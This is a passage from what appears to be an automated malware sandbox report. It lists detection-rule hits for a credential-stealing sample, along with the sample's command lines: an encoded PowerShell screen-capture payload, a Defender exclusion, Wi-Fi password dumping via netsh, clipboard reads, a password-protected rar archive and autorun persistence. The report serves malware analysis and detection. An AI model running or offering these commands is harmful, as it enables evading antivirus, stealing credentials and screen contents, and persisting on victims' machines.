JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f8645e1e85.exe
                                Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
                                Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7564, ProcessName: cmd.exe
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ProcessId: 1536, ProcessName: cmd.exe
                                Sigma detected: SCR File Write Event
                                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                                Sigma detected: Suspicious Execution of Powershell with Base64
                                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: Suspicious Screensaver Binary File Creation
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ProcessId: 6716, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                                Sigma detected: Dynamic CSharp Compile Artefact
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7584, TargetFilename: C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline
                                Sigma detected: Files Added To An Archive Using Rar.EXE
                                Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7532, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *, ProcessId: 3620, ProcessName: rar.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe', ProcessId: 6396, ProcessName: powershell.exe

                                Data Obfuscation

                                barindex
                                Sigma detected: Dot net compiler compiles file from suspicious location
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

                                Stealing of Sensitive Information

                                barindex
                                Sigma detected: Capture Wi-Fi password
                                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, ParentProcessId: 6716, ParentProcessName: D1UL0FG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7680, ProcessName: cmd.exe

                                Suricata Signatures

                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: file.exeAvira: detected
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exeAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306040
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
